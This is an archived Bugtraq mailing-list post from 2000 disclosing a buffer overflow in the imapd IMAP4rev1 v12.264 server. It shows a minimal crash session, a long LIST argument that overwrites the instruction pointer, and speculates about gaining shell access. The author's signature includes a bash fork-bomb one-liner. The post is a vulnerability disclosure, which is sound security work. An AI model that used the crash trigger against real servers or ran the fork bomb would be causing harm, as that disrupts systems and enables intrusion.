[14534] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

imapd4r1 v12.264

daemon@ATHENA.MIT.EDU (Michal Zalewski)
Sun Apr 16 22:13:25 2000

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-2
Message-Id:  <Pine.LNX.4.21.0004161411480.2819-100000@dione.ids.pl>
Date:         Sun, 16 Apr 2000 14:19:43 +0200
Reply-To: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit

Newest RH:

* OK nimue IMAP4rev1 v12.264 server ready
1 login lcamtuf test
1 OK LOGIN completed
1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;] 
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

*sigh*

Privledges seems to be dropped, but, anyway, it's nice way to get shell
access to mail account, maybe grab some data from memory etc. I believe
both imap and ipopd packages need code security audit.

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=




===========================================================================
List przyszedł z listy <secure@mud.pl>


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[14534] in bugtraq

imapd4r1 v12.264

daemon@ATHENA.MIT.EDU (Michal Zalewski)Sun Apr 16 22:13:25 2000

daemon@ATHENA.MIT.EDU (Michal Zalewski)
Sun Apr 16 22:13:25 2000